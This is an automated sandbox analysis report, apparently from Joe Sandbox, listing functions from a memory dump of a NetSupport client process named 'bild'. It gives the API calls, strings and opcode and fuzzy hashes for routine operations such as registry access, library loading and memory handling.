                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpenwvsprintf
                                                                                      • String ID: Error %d Opening regkey %s
                                                                                      • API String ID: 1772833024-3994271378
                                                                                      • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                      • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                      • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                      • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                      Function 110ED160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Closewvsprintf
                                                                                      • String ID: Error %d closing regkey %x
                                                                                      • API String ID: 843752472-892920262
                                                                                      • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                      • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                      • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                      • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                      Function 111463D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,00EEB898,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: HandleLibraryLoadModule
                                                                                      • String ID: NSMTRACE
                                                                                      • API String ID: 4133054770-4175627554
                                                                                      • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                      • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                      • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                      • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                      Function 11025CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: psapi.dll
                                                                                      • API String ID: 1029625771-80456845
                                                                                      • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                      • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                      • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                      • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                      Function 11014F80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: nslsp.dll
                                                                                      • API String ID: 1029625771-3933918195
                                                                                      • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                      • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                      • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                      • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                      Function 11074DC0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 11074E1F
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary_memset
                                                                                      • String ID:
                                                                                      • API String ID: 1654520187-0
                                                                                      • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                      • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                      • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                      • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                      Function 1105FCF0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1338273076-0
                                                                                      • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                      • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                      • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                      • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                      Function 1105EC90 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc_memmove
                                                                                      • String ID:
                                                                                      • API String ID: 1183979061-0
                                                                                      • Opcode ID: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                      • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                      • Opcode Fuzzy Hash: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                      • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                      Function 110883D0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 110883EF
                                                                                      • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection_memset
                                                                                      • String ID:
                                                                                      • API String ID: 453477542-0
                                                                                      • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                      • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                      • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                      • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                      Function 11144440 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                      • ExtractIconExA.SHELL32(?,00000000,0004048D,00040459,00000001), ref: 11144498
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExtractFileIconModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3911389742-0
                                                                                      • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                      • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                      • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                      • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                      Function 11163DB7 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                      • __lock_file.LIBCMT ref: 11163DFE
                                                                                        • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                      • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                      • String ID:
                                                                                      • API String ID: 2800547568-0
                                                                                      • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                      • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                      • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                      • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                      Function 11144EA0 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                        • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                      • GetLastError.KERNEL32(?,00EEB898,000000FF,?), ref: 11144ED5
